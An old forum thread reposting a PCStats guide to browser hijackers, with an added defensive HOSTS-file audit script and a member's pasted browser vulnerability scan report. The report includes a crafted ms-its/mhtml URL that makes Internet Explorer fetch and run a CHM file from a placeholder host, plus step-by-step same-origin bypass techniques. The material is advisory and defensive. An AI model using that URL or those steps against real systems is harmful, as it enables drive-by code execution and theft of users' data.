Browser Hijacking and How To Stop It

New member
Joined
Sep 21, 2004
Messages
5,398
Tokens
A PCStats Guide

If you thought Pop-ups were annoying, just wait until your web browser is hijacked! In this guide, PCstats shows you how to regain control and kick out the hijackers, kung-fu style...

Browser hijacking is one of the web's constant dangers. Whether it arrives in the form of a flood of obscene pop-up windows assaulting you after a mistyped URL, or malicious code taking over your browser completely, chances are good that every Internet user will be subjected to this practice in some form.

Fortunately, avoiding a browser hijacking is not impossible if you stay aware, and take a few simple precautions. Take the metaphor of locking your car doors while you are out for a drive as an example. If your browser keeps redirecting you to www.somerandomsite.com and you are here looking for ways to cure what ails you, we'll cover that too.

To sum it up, this PCstats Beginners Guide will show you how to avoid and defeat these annoying and potentially embarrassing attacks on your computer, starting with seven preventative measures:

1. Use common sense
2. Use and update an anti-virus program regularly
3. Use antivirus 'auto protection'
4. Keep an anti-hijack 'toolkit' for emergencies
5. Change your Internet Explorer security settings
6. Try an alternate browser

What's a Browser Hijacker?

This term covers a range of malicious software. The most generally accepted description for browser hijacking software is external code that changes your Internet Explorer settings. Generally your home page will be changed and new favourites will be added that point to sites of dubious content. In most cases, the hijacker will have made registry changes to your system, causing the home page to revert back to the unwanted destination even if you change it manually.

A browser hijacker may also disallow access to certain web pages, for example the site of an anti-spyware software manufacturer like Lavasoft. These programs have also been known to disable antivirus and anti-spyware software.

Most browser hijackers take advantage of Internet Explorer's ability to run ActiveX scripts straight from a web page. Generally, these programs will request permission to install themselves via a popup that loads when you visit a certain site. If you accidentally give them permission to install, IE will execute the program on your computer, changing your settings. Others may use security holes within Internet Explorer to install themselves automatically without any user interaction at all. Worse, these can be launched from popup ad windows which the user has not even intended to view.

As well as making changes to your home page and other Internet Explorer settings, a hijacker may also make entries to the HOSTS file on your system. This special file directly maps DNS addresses (web URLs) to IP addresses, so every time you typed 'www.pcstats.com' (as an example) you might be redirected to the IP address of a sponsored search or porn site instead.

Some browser hijackers may also install themselves onto your computer system as legitimate programs, leaving an entry in the 'add-remove programs' list in the control panel. There are many faces of browser hijacking, and to combat the situation, you have to be aware of all the tricks and loopholes that make this scourge possible. Browser hijacking isn't necessarily a virus, and isn't necessarily adware, so stopping it isn't necessarily best left to software monitoring programs either.

Guide continued here.


Phaedrus
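
The HOSTS-file tampering described in the guide above (names redirected to another server, or security sites made unreachable) can be checked for mechanically. This is an added example, not part of the original post or the PCStats guide; the function name `audit_hosts`, the sample file and the `.example` host names are constructed for illustration.

```python
import ipaddress

# Constructed sample of a tampered HOSTS file (not taken from a real system).
SAMPLE_HOSTS = """\
# Sample HOSTS file
127.0.0.1       localhost
203.0.113.7     www.pcstats.com        # name now resolves to another server
127.0.0.1       www.antispyware-vendor.example
0.0.0.0         update.antivirus-vendor.example
::1             localhost
not-an-ip       broken.example
"""

# Names that legitimately point at the local machine.
LOCAL_NAMES = {"localhost", "localhost.localdomain"}


def audit_hosts(text):
    """Return (line_no, kind, ip, hostname) for every suspicious mapping."""
    findings = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        entry = raw.split("#", 1)[0].strip()   # drop comments and padding
        if not entry:
            continue
        fields = entry.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            findings.append((line_no, "malformed", fields[0], ""))
            continue
        for name in (f.lower() for f in fields[1:]):
            if name in LOCAL_NAMES and ip.is_loopback:
                continue                       # normal localhost entry
            # A public name pinned to loopback or 0.0.0.0 cannot be reached.
            sinkholed = ip.is_loopback or ip.is_unspecified
            kind = "blocked" if sinkholed else "redirected"
            findings.append((line_no, kind, str(ip), name))
    return findings


if __name__ == "__main__":
    for finding in audit_hosts(SAMPLE_HOSTS):
        print(finding)
```

On Windows the file to read is `%SystemRoot%\System32\drivers\etc\hosts`. "Blocked" entries can also come from a deliberate ad-blocking list, so review findings before deleting lines.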
 

New member
Joined
Sep 21, 2004
Messages
5,398
Tokens
I love Mozilla, converted to it last year from an independent (3D Browse, which I love but which was contributing to massive headache problems) and have since gotten somewhat active in the Mozilla community and even worked on writing plugins and upgrades for it (not well, but working on it.)

The above post is aimed at the 95% or so people online who use IE, and the 95% of those people who never bother updating their security patches.


Phaedrus
 

Do you like my new avatar?
Joined
Oct 21, 2002
Messages
7,502
Tokens
I will be a guinea pig for the browser scan test, below are my results

Browser Security Test Results
Dear Customer,

The Browser Security Test is finished. Please find the results below:

High Risk Vulnerabilities 1
Medium Risk Vulnerabilities 3
Low Risk Vulnerabilities 0

High Risk Vulnerabilities
Microsoft Internet Explorer CHM File Processing Arbitrary Code Execution Vulnerability (bid9658)
Description
This bug can allow a malicious web site to automatically download and execute programs on your computer without your knowledge. This means that an attacker could infect your computer with a virus or install a program which may allow them to take control of your computer.

There is a virus found in the wild that uses this bug to infect computers.

Technical Details
CHM files are "Compiled HTML Help" files. This is a proprietary Microsoft format used for storing help files in Windows applications. CHM files can contain multiple HTML pages, tables of contents, indexes, etc.

When a CHM file is opened from a local disk, it is treated as trusted content, and the execution of scripts in CHM file is not restricted in any way. They can therefore start programs, write data to the disk, and so on.

When a user attempts to open a CHM file from a remote web site, normally Internet Explorer displays a dialog box asking what to do with the file. The dialog box includes a warning saying that the file can contain malicious content and allows the user to save the file without opening it.

This bug allows the warning from Internet Explorer to be bypassed and a CHM file to be downloaded and run automatically. This is done by redirecting the IFRAME to a specially crafted URL like this: "URL:ms-its: mhtml: file://C:\\ss.MHT!http://www.example.com//chm.chm::/files/launch.htm" Internet Explorer will download the chm.chm file from the specified website and execute it without warning the user. The CHM file can contain scripts that will have complete access to the user's computer.


Recommendations
We recommend using Windows Update to correct this problem.

Additional Information

Microsoft Internet Explorer Unspecified CHM File Processing Arbitrary Code Execution Vulnerability (bid 9658)
TrendMicro: PHP.Bizai virus description
Microsoft Security Bulletin MS04-013. Cumulative Security Update for Outlook Express (837009)


Medium Risk Vulnerabilities
Microsoft Internet Explorer Document Reference Zone Bypass Vulnerability (bid5841)
Description
This bug can allow a malicious web site to access your data on other web sites. For example it can be used to read your mail from a web mail system.

Technical Details
A malicious web site can circumvent same origin policy by doing the following:

1. open a window in its own domain
2. save a reference to (NewWindow).location.assign function or (NewWindow).location.replace function
3. change the location of the window to a URL in a different domain
4. use a saved reference to change the location of the window to a javascript: URL.

The javascript URL will be executed in the domain of the window. Normally once the location is changed to a different domain Javascript engine should not allow access to the functions of that window from original domain. However calling the functions through the reference saved beforehand circumvents this check.

Recommendations
We recommend using Windows Update to correct this problem.

Additional Information

Microsoft Security Bulletin MS02-066
November 2002, Cumulative Patch for Internet Explorer (Q328970)
MSIE:"SaveRef" turns Zone off

Microsoft Internet Explorer Multimedia Page Cross-Site Scripting Vulnerability (bid6481)
Description
This bug can allow a malicious web site to access your data on other web sites. For example it can be used to read your mail from a web mail system. The attacked web site needs to have a Flash animation file on it for this attack to work.

Technical Details
MSIE generates a page to load a multimedia file instead of loading it directly. The automatically generated page for loading a Flash animation file contains the URL of that file -- without any encoding. An attacker can make a link to a Flash file on another web site including some Javascript code in the URL. When the user clicks the link the Javascript code will be executed in the context of the other web site.

Recommendations
We recommend using Windows Update to correct this problem.

Additional Information

Microsoft Security Bulletin MS03-015
April 2003, Cumulative Patch for Internet Explorer (813489)
(MSIE)A rather old trick for web server is now played on MSIE.

Microsoft Internet Explorer Dialog Style Same Origin Policy Bypass Vulnerability (bid6306)
Description
This bug can allow a malicious web site to access your data on other web sites. For example it can be used to read your mail from a web mail system.

Technical Details
A web site can open a document in a dialog box using showModalDialog function. The document can originate from any domain, not necessarily from the same domain as the document that calls this function. The document that calls this function can supply style information for the dialog box. Style data can contain Javascript code. This Javascript code will be executed in the context of the document that gets opened. Thus one website can get Javascript code in the context of some other web site.

Recommendations
We recommend using Windows Update to correct this problem.

LESSON FOR THE DAY, IF YOU DON'T PAY ATTENTION AND STAY UPDATED AT WINDOWS UPDATE at least 20 times a month YOU can expect to continue to be fawked by MICROSOFT'S INEPT, fawking pos "PRODUCT"